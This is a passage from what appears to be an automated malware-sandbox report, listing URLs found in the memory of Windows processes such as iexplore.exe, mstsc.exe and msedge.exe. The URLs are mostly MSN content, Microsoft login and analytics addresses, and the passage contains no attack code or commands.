          Source: iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1n2rEV.img
          Source: iexplore.exe, 0000001D.00000002.4223626103.000000000ACDD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1n2rEV.img)
          Source: iexplore.exe, 0000001D.00000002.4229657635.000000000B0E4000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB4kwAp.img
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB4kwAp.img2
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006280000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB4kwAp.imgF
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB4kwAp.imgH
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB4kwAp.imgT
          Source: iexplore.exe, 0000001D.00000002.4193314739.0000000009B34000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009B34000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB4kwAp.imgz
          Source: iexplore.exe, 0000001D.00000002.4228929059.000000000B0C5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4222761580.000000000AC6F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBACBCB.img
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBACBCB.imgF
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBACBCB.imgG5
          Source: iexplore.exe, 0000001D.00000002.4193314739.0000000009C40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBACBCB.imgat
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBACBCB.imgh
          Source: iexplore.exe, 0000001D.00000002.4193314739.0000000009C40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBACBCB.imgmb
          Source: iexplore.exe, 0000001D.00000003.2485342541.000000000F790000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4193314739.0000000009B34000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4229657635.000000000B0E4000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009B34000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4211164062.000000000A6B1000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4249745118.000000000F790000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlpEjg.img
          Source: iexplore.exe, 0000001D.00000002.4193314739.0000000009BEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlpEjg.img...5
          Source: iexplore.exe, 0000001D.00000002.4193314739.0000000009B34000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009B34000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlpEjg.img2
          Source: iexplore.exe, 0000001D.00000002.4193314739.0000000009B34000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009B34000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlpEjg.img8(
          Source: iexplore.exe, 0000001D.00000002.4193314739.0000000009C40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlpEjg.imges
          Source: iexplore.exe, 0000001D.00000002.4193314739.0000000009C40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlpEjg.imgry
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: iexplore.exe, 0000001D.00000002.4190700229.0000000009A40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA13rZME
          Source: iexplore.exe, 0000001D.00000003.2485541600.000000000F794000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1jly9f
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAU2AGCu
          Source: explorer.exe, 00000005.00000000.1760442798.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: iexplore.exe, 0000001D.00000002.4160602763.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1d0ujS
          Source: iexplore.exe, 0000001D.00000003.2485541600.000000000F7A3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4178783359.0000000006E0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1kXpez?w=300&h=157&q=90
          Source: iexplore.exe, 0000001D.00000003.2485541600.000000000F794000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1m6ONl?w=300&h=157&q=90
          Source: iexplore.exe, 0000001D.00000003.2485541600.000000000F7AE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1m6THH?w=300&h=157&q=90
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4194392389.0000000009C7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1mwJnj?w=300&h=157&q=90
          Source: iexplore.exe, 0000001D.00000003.2485541600.000000000F7A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1mwJnj?w=300&h=157&q=90x
          Source: iexplore.exe, 0000001D.00000002.4189814301.00000000099A6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB4kwApS
          Source: iexplore.exe, 0000001D.00000003.2485541600.000000000F794000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BBlpEjg
          Source: mstsc.exe, 00000006.00000003.2058101000.0000000006BC6000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2002328904.0000000006B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
          Source: iexplore.exe, 0000000D.00000003.2079429125.000001BA5D39C000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167076882.000001BA5D273000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4159269749.000001BA5A882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D34E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: mstsc.exe, 00000006.00000002.4157660306.000000000323A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D478000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
          Source: mstsc.exe, 00000006.00000002.4157660306.000000000323A000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4157660306.000000000325F000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: mstsc.exe, 00000006.00000002.4157660306.000000000325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033=
          Source: mstsc.exe, 00000006.00000002.4157660306.000000000323A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033C
          Source: mstsc.exe, 00000006.00000002.4157660306.0000000003218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033L
          Source: mstsc.exe, 00000006.00000002.4157660306.0000000003218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
          Source: mstsc.exe, 00000006.00000002.4157660306.000000000323A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D34E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: mstsc.exe, 00000006.00000002.4157660306.000000000323A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: mstsc.exe, 00000006.00000003.1890565199.00000000062AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
          Source: iexplore.exe, 0000000E.00000002.4160624814.0000000003116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/~
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com8
          Source: iexplore.exe, 0000001D.00000002.4160602763.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com8LMEM0
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comEj
          Source: iexplore.exe, 0000000E.00000002.4160624814.0000000003132000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comLLMEM0
          Source: iexplore.exe, 0000001D.00000002.4193314739.0000000009C06000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metro.co.uk/2024/05/02/ozempic-face-altering-way-people-lo
          Source: iexplore.exe, 0000001D.00000002.4229657635.000000000B0E4000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4235969872.000000000CEF2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4235839468.000000000CEE1000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4193314739.0000000009BEC000.00000004.00000001.00020000.00000000.sdmp, me[1].json.29.drString found in binary or memory: https://metro.co.uk/2024/05/02/ozempic-face-altering-way-people-look-2-20760591/?ITO=msn
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metro.co.uk/2024/05/02/ozempic-face-altering-way-people-look-2-20760591/?ITO=msnf
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metro.co.uk/2024/05/02/ozempic-face-altering-way-people-look-2-20760591/?ITO=msnnon
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metro.co.uk/2024/05/02/ozempic-face-altering-way-people-look-2-20760591/?ITO=msnnon~)
          Source: mstsc.exe, 00000006.00000003.2002328904.0000000006B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
          Source: msedge.exe, 00000021.00000002.2249669462.00003D540035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000002.2331673895.00001AA4024C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
          Source: msedge.exe, 00000021.00000002.2249669462.00003D540035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000002.2331673895.00001AA4024C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
          Source: iexplore.exe, 0000001D.00000002.4211164062.000000000A6B1000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4191854169.0000000009A7B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://msn.com/en-us/news/us/about-us/ar-BBN0NAK
          Source: iexplore.exe, 0000001D.00000002.4191854169.0000000009A7B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://msn.com/en-us/news/us/about-us/ar-BBN0NAKAW
          Source: iexplore.exe, 0000000E.00000002.4211423942.000000000AE2A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://msn.com/en-us/news/us/about-us/ar-BBN0NAKInternet
          Source: msedge.exe, 00000021.00000002.2249669462.00003D540035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000002.2331673895.00001AA4024C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
          Source: explorer.exe, 00000005.00000002.4196481242.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1769871733.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: iexplore.exe, 0000000E.00000002.4213246226.000000000AEAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://peregrinebaselines.blob.core.windows.net/baselines
          Source: iexplore.exe, 0000001D.00000002.4221969780.000000000AC21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://peregrinebaselines.blob.core.windows.net/baselines3
          Source: msedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
          Source: msedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
          Source: msedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxAB
          Source: msedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
          Source: msedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
          Source: msedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
          Source: msedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
          Source: msedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
          Source: msedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
          Source: msedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
          Source: msedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
          Source: msedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
          Source: msedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
          Source: msedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
          Source: explorer.exe, 00000005.00000002.4196481242.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1769871733.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: iexplore.exe, 0000001D.00000002.4193247232.0000000009AEC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4228571594.000000000B0B5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod-streaming-video-msn-com.akamaized.net/04e99188-67bf-4d39-a9c2-d0a64fdd8346/08d8fb51-c0b
          Source: iexplore.exe, 0000001D.00000002.4228929059.000000000B0D5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod-streaming-video-msn-com.akamaized.net/42fdc0da-5999-4131-bca0-f9a4793e57b0/ca13e008-db4
          Source: iexplore.exe, 0000001D.00000002.4228929059.000000000B0D5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod-streaming-video-msn-com.akamaized.net/7ae83d55-ea63-48ec-9a20-c7f92c762e1d/af01bf26-a5e
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod-streaming-video-msn-com.akamaized.net/9c48c4c3-16b1-4cf8-8c68-10a8348428f6/af01bf26-a5e
          Source: iexplore.exe, 0000001D.00000002.4228571594.000000000B0B5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod-streaming-video-msn-com.akamaized.net/a383828f-ce7c-44d4-9b76-7d732aae13a7/08d8fb51-c0b
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod-streaming-video-msn-com.akamaized.net/f5fa6d02-f45e-4e9b-89de-4759831fc61d/ca13e008-db4
          Source: iexplore.exe, 0000001D.00000002.4230091008.000000000B0FF000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4193247232.0000000009AEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod-video-cms-amp-microsoft-com.akamaized.net/tenant/amp/entityid/AA1nCym8?blobrefkey=close
          Source: iexplore.exe, 0000001D.00000002.4230091008.000000000B0FF000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod-video-cms-amp-microsoft-com.akamaized.net/tenant/amp/entityid/BB1mUepA?blobrefkey=close
          Source: iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod-video-cms-amp-microsoft-com.akamaized.net/tenant/amp/entityid/BB1mWYH7?blobrefkey=close
          Source: iexplore.exe, 0000001D.00000002.4228929059.000000000B0D5000.00000004.00000001.00020000.00000000.sdmp, me[1].json.29.drString found in binary or memory: https://rankings.futbolsitesmedia.com/bus/netflix-marathon-25-shows-to-keep-you-glued-to-the-screen
          Source: iexplore.exe, 0000000E.00000002.4160624814.000000000318F000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4160624814.0000000003116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com/
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com//8
          Source: iexplore.exe, 0000001D.00000002.4223084652.000000000AC8C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com/b
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com/b2?rn=1716792163636&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4190391744.0000000009510000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4186383756.0000000006B27000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com/b?rn=1716792163636&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.m
          Source: iexplore.exe, 0000001D.00000002.4160602763.0000000000857000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4175644737.000000000636A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com/b?rn=1716792164814&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.m
          Source: iexplore.exe, 0000000E.00000002.4210835737.000000000AE17000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com/bD
          Source: iexplore.exe, 0000000E.00000002.4160624814.000000000318F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com/j
          Source: iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com/n/x-json-stream&w=0&anoncknm=anon-
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com/s;&H
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeString found in binary or memory: https://sectigo.com/CPS0
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: iexplore.exe, 0000001D.00000002.4190700229.0000000009A0D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4236924812.000000000CF98000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sports.yahoo.com/aces-waive-rookie-dyaisha-fair-after-debut-just-4-games-into-wnba-season-23
